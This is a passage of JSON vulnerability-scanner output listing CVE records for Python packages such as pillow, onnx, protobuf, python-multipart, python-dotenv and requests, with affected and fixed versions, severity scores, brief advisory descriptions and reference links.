"V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
"V3Score": 5.5
},
"redhat": {
"V3Vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N",
"V3Score": 4.7
}
},
"References": [
"https://access.redhat.com/security/cve/CVE-2026-34446",
"https://github.com/onnx/onnx",
"https://github.com/onnx/onnx/commit/4755f8053928dce18a61db8fec71b69c74f786cb",
"https://github.com/onnx/onnx/security/advisories/GHSA-cmw6-hcpp-c6jp",
"https://nvd.nist.gov/vuln/detail/CVE-2026-34446",
"https://www.cve.org/CVERecord?id=CVE-2026-34446"
],
"PublishedDate": "2026-04-01T18:16:30.66Z",
"LastModifiedDate": "2026-06-17T10:39:03.783Z"
},
{
"VulnerabilityID": "CVE-2026-34447",
"PkgName": "onnx",
"PkgIdentifier": {
"PURL": "pkg:pypi/onnx@1.17.0"
},
"InstalledVersion": "1.17.0",
"FixedVersion": "1.21.0",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-34447",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory pip",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
},
"Title": "Open Neural Network Exchange (ONNX) is an open standard for machine le ...",
"Description": "Open Neural Network Exchange (ONNX) is an open standard for machine learning interoperability. Prior to version 1.21.0, there is a symlink traversal vulnerability in external data loading allows reading files outside the model directory. This issue has been patched in version 1.21.0.",
"Severity": "MEDIUM",
"CweIDs": [
"CWE-22",
"CWE-61"
],
"VendorSeverity": {
"ghsa": 2,
"ubuntu": 2
},
"CVSS": {
"ghsa": {
"V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
"V3Score": 5.5
}
},
"References": [
"https://github.com/onnx/onnx",
"https://github.com/onnx/onnx/security/advisories/GHSA-p433-9wv8-28xj",
"https://github.com/pypa/advisory-database/tree/main/vulns/onnx/PYSEC-2026-104.yaml",
"https://nvd.nist.gov/vuln/detail/CVE-2026-34447",
"https://www.cve.org/CVERecord?id=CVE-2026-34447"
],
"PublishedDate": "2026-04-01T18:16:30.81Z",
"LastModifiedDate": "2026-06-17T10:39:03.897Z"
},
{
"VulnerabilityID": "CVE-2026-25990",
"PkgName": "pillow",
"PkgIdentifier": {
"PURL": "pkg:pypi/pillow@12.0.0"
},
"InstalledVersion": "12.0.0",
"FixedVersion": "12.1.1",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-25990",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory pip",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
},
"Title": "pillow: Pillow: Out-of-bounds Write via Specially Crafted PSD Image",
"Description": "Pillow is a Python imaging library. From 10.3.0 to before 12.1.1, an out-of-bounds write may be triggered when loading a specially crafted PSD image. This vulnerability is fixed in 12.1.1.",
"Severity": "HIGH",
"CweIDs": [
"CWE-787"
],
"VendorSeverity": {
"amazon": 3,
"bitnami": 3,
"ghsa": 3,
"nvd": 3,
"redhat": 3,
"ubuntu": 2
},
"CVSS": {
"bitnami": {},
"ghsa": {},
"nvd": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"V3Score": 7.5
},
"redhat": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"V3Score": 7.3
}
},
"References": [
"http://www.openwall.com/lists/oss-security/2026/02/12/1",
"https://access.redhat.com/security/cve/CVE-2026-25990",
"https://github.com/python-pillow/Pillow",
"https://github.com/python-pillow/Pillow/commit/54ba4db542ad3c7b918812a4e2d69c27735a3199",
"https://github.com/python-pillow/Pillow/commit/9000313cc5d4a31bdcdd6d7f0781101abab553aa",
"https://github.com/python-pillow/Pillow/pull/9427",
"https://github.com/python-pillow/Pillow/security/advisories/GHSA-cfh3-3jmp-rvhc",
"https://nvd.nist.gov/vuln/detail/CVE-2026-25990",
"https://pillow.readthedocs.io/en/stable/releasenotes/12.1.1.html",
"https://ubuntu.com/security/notices/USN-8047-1",
"https://www.cve.org/CVERecord?id=CVE-2026-25990"
],
"PublishedDate": "2026-02-11T21:16:20.67Z",
"LastModifiedDate": "2026-06-17T10:25:33.403Z"
},
{
"VulnerabilityID": "CVE-2026-40192",
"PkgName": "pillow",
"PkgIdentifier": {
"PURL": "pkg:pypi/pillow@12.0.0"
},
"InstalledVersion": "12.0.0",
"FixedVersion": "12.2.0",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-40192",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory pip",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
},
"Title": "Pillow: Pillow: Denial of Service via decompression bomb in FITS image processing",
"Description": "Pillow is a Python imaging library. Versions 10.3.0 through 12.1.1 did not limit the amount of GZIP-compressed data read when decoding a FITS image, making them vulnerable to decompression bomb attacks. A specially crafted FITS file could cause unbounded memory consumption, leading to denial of service (OOM crash or severe performance degradation). If users are unable to immediately upgrade, they should only open specific image formats, excluding FITS, as a workaround.",
"Severity": "HIGH",
"CweIDs": [
"CWE-400",
"CWE-770"
],
"VendorSeverity": {
"bitnami": 3,
"ghsa": 3,
"nvd": 3,
"redhat": 3,
"ubuntu": 2
},
"CVSS": {
"bitnami": {},
"ghsa": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"V3Score": 7.5
},
"nvd": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"V3Score": 7.5
},
"redhat": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"V3Score": 7.5
}
},
"References": [
"https://access.redhat.com/security/cve/CVE-2026-40192",
"https://github.com/python-pillow/Pillow",
"https://github.com/python-pillow/Pillow/commit/3cb854e8b2bab43f40e342e665f9340d861aa628",
"https://github.com/python-pillow/Pillow/pull/9521",
"https://github.com/python-pillow/Pillow/security/advisories/GHSA-whj4-6x5x-4v2j",
"https://nvd.nist.gov/vuln/detail/CVE-2026-40192",
"https://pillow.readthedocs.io/en/stable/releasenotes/12.2.0.html#prevent-fits-decompression-bomb",
"https://ubuntu.com/security/notices/USN-8211-1",
"https://www.cve.org/CVERecord?id=CVE-2026-40192"
],
"PublishedDate": "2026-04-15T23:16:10.053Z",
"LastModifiedDate": "2026-06-17T10:44:50.92Z"
},
{
"VulnerabilityID": "CVE-2026-42311",
"PkgName": "pillow",
"PkgIdentifier": {
"PURL": "pkg:pypi/pillow@12.0.0"
},
"InstalledVersion": "12.0.0",
"FixedVersion": "12.2.0",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-42311",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory pip",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
},
"Title": "Pillow is a Python imaging library. From version 10.3.0 to before vers ...",
"Description": "Pillow is a Python imaging library. From version 10.3.0 to before version 12.2.0, processing a malicious PSD file could lead to memory corruption, potentially resulting in a crash or arbitrary code execution. This issue has been patched in version 12.2.0.",
"Severity": "HIGH",
"CweIDs": [
"CWE-190",
"CWE-787"
],
"VendorSeverity": {
"amazon": 3,
"bitnami": 3,
"ghsa": 3,
"nvd": 3,
"ubuntu": 2
},
"CVSS": {
"bitnami": {},
"ghsa": {},
"nvd": {
"V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"V3Score": 7.8
}
},
"References": [
"https://github.com/python-pillow/Pillow",
"https://github.com/python-pillow/Pillow/commit/58f9a1d166dcb0c274807d4423522d205b0c35ea",
"https://github.com/python-pillow/Pillow/pull/9520",
"https://github.com/python-pillow/Pillow/releases/tag/12.2.0",
"https://github.com/python-pillow/Pillow/security/advisories/GHSA-cfh3-3jmp-rvhc",
"https://github.com/python-pillow/Pillow/security/advisories/GHSA-pwv6-vv43-88gr",
"https://nvd.nist.gov/vuln/detail/CVE-2026-42311",
"https://ubuntu.com/security/notices/USN-8399-1",
"https://www.cve.org/CVERecord?id=CVE-2026-42311"
],
"PublishedDate": "2026-05-09T06:16:10.43Z",
"LastModifiedDate": "2026-06-17T10:47:40.52Z"
},
{
"VulnerabilityID": "CVE-2026-42308",
"PkgName": "pillow",
"PkgIdentifier": {
"PURL": "pkg:pypi/pillow@12.0.0"
},
"InstalledVersion": "12.0.0",
"FixedVersion": "12.2.0",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-42308",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory pip",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
},
"Title": "Pillow: python: Pillow: Denial of Service via integer overflow in font processing",
"Description": "Pillow is a Python imaging library. Prior to version 12.2.0, if a font advances for each glyph by an exceeding large amount, when Pillow keeps track of the current position, it may lead to an integer overflow. This issue has been patched in version 12.2.0.",
"Severity": "MEDIUM",
"CweIDs": [
"CWE-190"
],
"VendorSeverity": {
"amazon": 3,
"bitnami": 2,
"ghsa": 2,
"nvd": 2,
"redhat": 2,
"ubuntu": 2
},
"CVSS": {
"bitnami": {},
"ghsa": {
"V3Vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"V3Score": 5.5
},
"nvd": {
"V3Vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"V3Score": 5.5
},
"redhat": {
"V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"V3Score": 6.2
}
},
"References": [
"https://access.redhat.com/security/cve/CVE-2026-42308",
"https://github.com/pypa/advisory-database/tree/main/vulns/pillow/PYSEC-2026-165.yaml",
"https://github.com/python-pillow/Pillow",
"https://github.com/python-pillow/Pillow/pull/9518/changes (suspected fix)",
"https://github.com/python-pillow/Pillow/releases/tag/12.2.0",
"https://github.com/python-pillow/Pillow/security/advisories/GHSA-wjx4-4jcj-g98j",
"https://nvd.nist.gov/vuln/detail/CVE-2026-42308",
"https://ubuntu.com/security/notices/USN-8399-1",
"https://www.cve.org/CVERecord?id=CVE-2026-42308"
],
"PublishedDate": "2026-05-09T06:16:09.793Z",
"LastModifiedDate": "2026-06-17T10:47:40.18Z"
},
{
"VulnerabilityID": "CVE-2026-42309",
"PkgName": "pillow",
"PkgIdentifier": {
"PURL": "pkg:pypi/pillow@12.0.0"
},
"InstalledVersion": "12.0.0",
"FixedVersion": "12.2.0",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-42309",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory pip",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
},
"Title": "Pillow: Pillow: Denial of Service via specially crafted coordinate input",
"Description": "Pillow is a Python imaging library. From version 11.2.1 to before version 12.2.0, passing nested lists as coordinates to APIs that accept coordinates such as ImagePath.Path, ImageDraw.ImageDraw.polygon and ImageDraw.ImageDraw.line could cause a heap buffer overflow, as nested lists were recursively unpacked beyond the allocated buffer. Coordinate lists are now validated to contain exactly two numeric coordinates. This issue has been patched in version 12.2.0.",
"Severity": "MEDIUM",
"CweIDs": [
"CWE-122"
],
"VendorSeverity": {
"bitnami": 2,
"ghsa": 2,
"nvd": 2,
"redhat": 2,
"ubuntu": 2
},
"CVSS": {
"bitnami": {},
"ghsa": {
"V3Vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"V3Score": 5.5
},
"nvd": {
"V3Vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"V3Score": 5.5
},
"redhat": {
"V3Vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"V3Score": 5.1
}
},
"References": [
"https://access.redhat.com/security/cve/CVE-2026-42309",
"https://github.com/python-pillow/Pillow",
"https://github.com/python-pillow/Pillow/releases/tag/12.2.0",
"https://github.com/python-pillow/Pillow/security/advisories/GHSA-5xmw-vc9v-4wf2",
"https://nvd.nist.gov/vuln/detail/CVE-2026-42309",
"https://ubuntu.com/security/notices/USN-8399-1",
"https://www.cve.org/CVERecord?id=CVE-2026-42309"
],
"PublishedDate": "2026-05-09T06:16:10.073Z",
"LastModifiedDate": "2026-06-17T10:47:40.293Z"
},
{
"VulnerabilityID": "CVE-2026-42310",
"PkgName": "pillow",
"PkgIdentifier": {
"PURL": "pkg:pypi/pillow@12.0.0"
},
"InstalledVersion": "12.0.0",
"FixedVersion": "12.2.0",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-42310",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory pip",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
},
"Title": "Pillow: Pillow: Denial of Service via malicious PDF processing",
"Description": "Pillow is a Python imaging library. From version 4.2.0 to before version 12.2.0, an attacker can supply a malicious PDF that causes the process to hang indefinitely, consuming 100% CPU and making the application unresponsive. This issue has been patched in version 12.2.0.",
"Severity": "MEDIUM",
"CweIDs": [
"CWE-835"
],
"VendorSeverity": {
"amazon": 3,
"bitnami": 2,
"ghsa": 2,
"nvd": 2,
"redhat": 2,
"ubuntu": 2
},
"CVSS": {
"bitnami": {},
"ghsa": {
"V3Vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"V3Score": 5.5
},
"nvd": {
"V3Vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"V3Score": 5.5
},
"redhat": {
"V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"V3Score": 4
}
},
"References": [
"https://access.redhat.com/security/cve/CVE-2026-42310",
"https://github.com/python-pillow/Pillow",
"https://github.com/python-pillow/Pillow/commit/3bf614e4b8615d0ce1d5039efaf6db447fe7c468",
"https://github.com/python-pillow/Pillow/pull/9519",
"https://github.com/python-pillow/Pillow/releases/tag/12.2.0",
"https://github.com/python-pillow/Pillow/security/advisories/GHSA-r73j-pqj5-w3x7",
"https://nvd.nist.gov/vuln/detail/CVE-2026-42310",
"https://ubuntu.com/security/notices/USN-8399-1",
"https://www.cve.org/CVERecord?id=CVE-2026-42310"
],
"PublishedDate": "2026-05-09T06:16:10.273Z",
"LastModifiedDate": "2026-06-17T10:47:40.407Z"
},
{
"VulnerabilityID": "CVE-2026-0994",
"PkgName": "protobuf",
"PkgIdentifier": {
"PURL": "pkg:pypi/protobuf@6.33.2"
},
"InstalledVersion": "6.33.2",
"FixedVersion": "6.33.5, 5.29.6",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-0994",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory pip",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
},
"Title": "python: protobuf: Protobuf: Denial of Service due to recursion depth bypass",
"Description": "A denial-of-service (DoS) vulnerability exists in google.protobuf.json_format.ParseDict() in Python, where the max_recursion_depth limit can be bypassed when parsing nested google.protobuf.Any messages.\n\nDue to missing recursion depth accounting inside the internal Any-handling logic, an attacker can supply deeply nested Any structures that bypass the intended recursion limit, eventually exhausting Python\u2019s recursion stack and causing a RecursionError.",
"Severity": "HIGH",
"CweIDs": [
"CWE-674"
],
"VendorSeverity": {
"alma": 3,
"amazon": 3,
"azure": 3,
"cbl-mariner": 3,
"ghsa": 3,
"nvd": 3,
"oracle-oval": 3,
"photon": 3,
"redhat": 3,
"rocky": 3,
"ubuntu": 2
},
"CVSS": {
"ghsa": {},
"nvd": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"V3Score": 7.5
},
"redhat": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"V3Score": 7.5
}
},
"References": [
"https://access.redhat.com/errata/RHSA-2026:3095",
"https://access.redhat.com/security/cve/CVE-2026-0994",
"https://bugzilla.redhat.com/2432398",
"https://bugzilla.redhat.com/show_bug.cgi?id=2432398",
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0994",
"https://errata.almalinux.org/9/ALSA-2026-3095.html",
"https://errata.rockylinux.org/RLSA-2026:3094",
"https://github.com/protocolbuffers/protobuf",
"https://github.com/protocolbuffers/protobuf/commit/5ebddcb1bcbe51d1fe323baa145e85f4f23128cf",
"https://github.com/protocolbuffers/protobuf/commit/d2b001626d137c62dfee6c88c87324102531868b",
"https://github.com/protocolbuffers/protobuf/issues/25070",
"https://github.com/protocolbuffers/protobuf/pull/25239",
"https://github.com/protocolbuffers/protobuf/pull/25586 (33.x)",
"https://github.com/protocolbuffers/protobuf/pull/25587 (29.x)",
"https://linux.oracle.com/cve/CVE-2026-0994.html",
"https://linux.oracle.com/errata/ELSA-2026-3095.html",
"https://nvd.nist.gov/vuln/detail/CVE-2026-0994",
"https://ubuntu.com/security/notices/USN-8063-1",
"https://ubuntu.com/security/notices/USN-8063-2",
"https://www.cve.org/CVERecord?id=CVE-2026-0994"
],
"PublishedDate": "2026-01-23T15:16:06.84Z",
"LastModifiedDate": "2026-06-17T10:11:44.34Z"
},
{
"VulnerabilityID": "CVE-2026-28684",
"PkgName": "python-dotenv",
"PkgIdentifier": {
"PURL": "pkg:pypi/python-dotenv@1.1.0"
},
"InstalledVersion": "1.1.0",
"FixedVersion": "1.2.2",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-28684",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory pip",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
},
"Title": "python-dotenv: python-dotenv: Arbitrary file overwrite via symbolic link following",
"Description": "python-dotenv reads key-value pairs from a .env file and can set them as environment variables. Prior to version 1.2.2, `set_key()` and `unset_key()` in python-dotenv follow symbolic links when rewriting `.env` files, allowing a local attacker to overwrite arbitrary files via a crafted symlink when a cross-device rename fallback is triggered. Users should upgrade to v.1.2.2 or, as a workaround, apply the patch manually.",
"Severity": "MEDIUM",
"CweIDs": [
"CWE-59",
"CWE-61"
],
"VendorSeverity": {
"ghsa": 2,
"redhat": 2
},
"CVSS": {
"ghsa": {
"V3Vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:H",
"V3Score": 6.6
},
"redhat": {
"V3Vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
"V3Score": 7.1
}
},
"References": [
"https://access.redhat.com/security/cve/CVE-2026-28684",
"https://github.com/theskumar/python-dotenv",
"https://github.com/theskumar/python-dotenv/commit/790c5c02991100aa1bf41ee5330aca75edc51311",
"https://github.com/theskumar/python-dotenv/commit/790c5c02991100aa1bf41ee5330aca75edc51311.patch",
"https://github.com/theskumar/python-dotenv/releases/tag/v1.2.2",
"https://github.com/theskumar/python-dotenv/security/advisories/GHSA-mf9w-mj56-hr94",
"https://nvd.nist.gov/vuln/detail/CVE-2026-28684",
"https://www.cve.org/CVERecord?id=CVE-2026-28684"
],
"PublishedDate": "2026-04-20T17:16:33.087Z",
"LastModifiedDate": "2026-06-17T10:28:54.243Z"
},
{
"VulnerabilityID": "CVE-2026-24486",
"PkgName": "python-multipart",
"PkgIdentifier": {
"PURL": "pkg:pypi/python-multipart@0.0.20"
},
"InstalledVersion": "0.0.20",
"FixedVersion": "0.0.22",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-24486",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory pip",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
},
"Title": "python-multipart: Python-Multipart: Arbitrary file write via path traversal vulnerability",
"Description": "Python-Multipart is a streaming multipart parser for Python. Prior to version 0.0.22, a Path Traversal vulnerability exists when using non-default configuration options `UPLOAD_DIR` and `UPLOAD_KEEP_FILENAME=True`. An attacker can write uploaded files to arbitrary locations on the filesystem by crafting a malicious filename. Users should upgrade to version 0.0.22 to receive a patch or, as a workaround, avoid using `UPLOAD_KEEP_FILENAME=True` in project configurations.",
"Severity": "HIGH",
"CweIDs": [
"CWE-22"
],
"VendorSeverity": {
"ghsa": 3,
"nvd": 3,
"redhat": 3,
"ubuntu": 2
},
"CVSS": {
"ghsa": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L",
"V3Score": 8.6
},
"nvd": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"V3Score": 7.5
},
"redhat": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L",
"V3Score": 8.6
}
},
"References": [
"https://access.redhat.com/security/cve/CVE-2026-24486",
"https://github.com/Kludex/python-multipart",
"https://github.com/Kludex/python-multipart/commit/9433f4bbc9652bdde82bbe380984e32f8cfc89c4",
"https://github.com/Kludex/python-multipart/commit/9433f4bbc9652bdde82bbe380984e32f8cfc89c4 (0.0.22)",
"https://github.com/Kludex/python-multipart/releases/tag/0.0.22",
"https://github.com/Kludex/python-multipart/security/advisories/GHSA-wp53-j4wj-2cfg",
"https://nvd.nist.gov/vuln/detail/CVE-2026-24486",
"https://ubuntu.com/security/notices/USN-8027-1",
"https://www.cve.org/CVERecord?id=CVE-2026-24486"
],
"PublishedDate": "2026-01-27T01:16:02.303Z",
"LastModifiedDate": "2026-06-17T10:23:08.463Z"
},
{
"VulnerabilityID": "CVE-2026-42561",
"PkgName": "python-multipart",
"PkgIdentifier": {
"PURL": "pkg:pypi/python-multipart@0.0.20"
},
"InstalledVersion": "0.0.20",
"FixedVersion": "0.0.27",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-42561",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory pip",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
},
"Title": "Python-Multipart is a streaming multipart parser for Python. Prior to ...",
"Description": "Python-Multipart is a streaming multipart parser for Python. Prior to 0.0.27, python-multipart has a denial of service vulnerability in multipart part header parsing. When parsing multipart/form-data, MultipartParser previously had no limit on the number of part headers or the size of an individual part header. An attacker could send a request with either many repeated headers without terminating the header block or a single very large header value, causing excessive CPU work before request rejection or completion. This vulnerability is fixed in 0.0.27.",
"Severity": "HIGH",
"CweIDs": [
"CWE-770"
],
"VendorSeverity": {
"ghsa": 3
},
"CVSS": {
"ghsa": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"V3Score": 7.5
}
},
"References": [
"https://github.com/Kludex/python-multipart",
"https://github.com/Kludex/python-multipart/security/advisories/GHSA-pp6c-gr5w-3c5g",
"https://nvd.nist.gov/vuln/detail/CVE-2026-42561"
],
"PublishedDate": "2026-05-13T21:16:47.07Z",
"LastModifiedDate": "2026-06-17T10:48:02.413Z"
},
{
"VulnerabilityID": "CVE-2026-53539",
"PkgName": "python-multipart",
"PkgIdentifier": {
"PURL": "pkg:pypi/python-multipart@0.0.20"
},
"InstalledVersion": "0.0.20",
"FixedVersion": "0.0.30",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-53539",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory pip",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
},
"Title": "Python-Multipart is a streaming multipart parser for Python. Prior to ...",
"Description": "Python-Multipart is a streaming multipart parser for Python. Prior to 0.0.30, when parsing application/x-www-form-urlencoded bodies, QuerystringParser located the field separator with a two step lookup: it first scanned the entire remaining buffer for &, and only when no & existed anywhere ahead did it fall back to scanning for ;. For a body that uses ; as the separator and contains no &, every field iteration performed a full failed & scan over the entire remaining buffer before locating the nearby ;. With N semicolon separated fields in a chunk of size B, this yields O(B^2) byte comparisons per chunk. An attacker can submit a small crafted body of the form a;a;a;... and cause the parser to spend seconds of CPU per request. A handful of concurrent requests can exhaust worker processes. This vulnerability is fixed in 0.0.30.",
"Severity": "HIGH",
"CweIDs": [
"CWE-400",
"CWE-407"
],
"VendorSeverity": {
"ghsa": 3
},
"CVSS": {
"ghsa": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"V3Score": 7.5
}
},
"References": [
"https://github.com/Kludex/python-multipart",
"https://github.com/Kludex/python-multipart/security/advisories/GHSA-5rvq-cxj2-64vf"
],
"PublishedDate": "2026-06-22T18:16:44.36Z",
"LastModifiedDate": "2026-06-22T18:16:44.36Z"
},
{
"VulnerabilityID": "CVE-2026-40347",
"PkgName": "python-multipart",
"PkgIdentifier": {
"PURL": "pkg:pypi/python-multipart@0.0.20"
},
"InstalledVersion": "0.0.20",
"FixedVersion": "0.0.26",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-40347",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory pip",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
},
"Title": "python-multipart: Python-Multipart: Denial of Service via crafted multipart/form-data requests",
"Description": "Python-Multipart is a streaming multipart parser for Python. Versions prior to 0.0.26 have a denial of service vulnerability when parsing crafted `multipart/form-data` requests with large preamble or epilogue sections. Upgrade to version 0.0.26 or later, which skips ahead to the next boundary candidate when processing leading CR/LF data and immediately discards epilogue data after the closing boundary.",
"Severity": "MEDIUM",
"CweIDs": [
"CWE-400",
"CWE-834"
],
"VendorSeverity": {
"ghsa": 2,
"redhat": 2
},
"CVSS": {
"ghsa": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"V3Score": 5.3
},
"redhat": {
"V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"V3Score": 5.9
}
},
"References": [
"https://access.redhat.com/security/cve/CVE-2026-40347",
"https://github.com/Kludex/python-multipart",
"https://github.com/Kludex/python-multipart/releases/tag/0.0.26",
"https://github.com/Kludex/python-multipart/security/advisories/GHSA-mj87-hwqh-73pj",
"https://nvd.nist.gov/vuln/detail/CVE-2026-40347",
"https://www.cve.org/CVERecord?id=CVE-2026-40347"
],
"PublishedDate": "2026-04-18T00:16:38.52Z",
"LastModifiedDate": "2026-06-17T10:45:09.547Z"
},
{
"VulnerabilityID": "CVE-2026-25645",
"PkgName": "requests",
"PkgIdentifier": {
"PURL": "pkg:pypi/requests@2.32.5"
},
"InstalledVersion": "2.32.5",
"FixedVersion": "2.33.0",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-25645",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory pip",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
},
"Title": "requests: Requests: Security bypass due to predictable temporary file creation",
"Description": "Requests is a HTTP library. Prior to version 2.33.0, the `requests.utils.extract_zipped_paths()` utility function uses a predictable filename when extracting files from zip archives into the system temporary directory. If the target file already exists, it is reused without validation. A local attacker with write access to the temp directory could pre-create a malicious file that would be loaded in place of the legitimate one. Standard usage of the Requests library is not affected by this vulnerability. Only applications that call `extract_zipped_paths()` directly are impacted. Starting in version 2.33.0, the library extracts files to a non-deterministic location. If developers are unable to upgrade, they can set `TMPDIR` in their environment to a directory with restricted write access.",
"Severity": "MEDIUM",
"CweIDs": [
"CWE-377"
],
"VendorSeverity": {
"azure": 2,
"ghsa": 2,
"nvd": 2,
"photon": 2,
"redhat": 2
},
"CVSS": {
"ghsa": {
"V3Vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:N/I:H/A:N",
"V3Score": 4.4
},
"nvd": {
"V3Vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
"V3Score": 5.5
},
"redhat": {
"V3Vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N",
"V3Score": 4.7
}
},
"References": [
"https://access.redhat.com/security/cve/CVE-2026-25645",
"https://github.com/psf/requests",
"https://github.com/psf/requests/commit/66d21cb07bd6255b1280291c4fafb71803cdb3b7",
"https://github.com/psf/requests/releases/tag/v2.33.0",
"https://github.com/psf/requests/security/advisories/GHSA-gc5v-m9x4-r6x2",
"https://nvd.nist.gov/vuln/detail/CVE-2026-25645",
"https://www.cve.org/CVERecord?id=CVE-2026-25645"
],
"PublishedDate": "2026-03-25T17:16:52.97Z",
"LastModifiedDate": "2026-06-17T10:25:00.443Z"
},
{
"VulnerabilityID": "CVE-2026-48818",
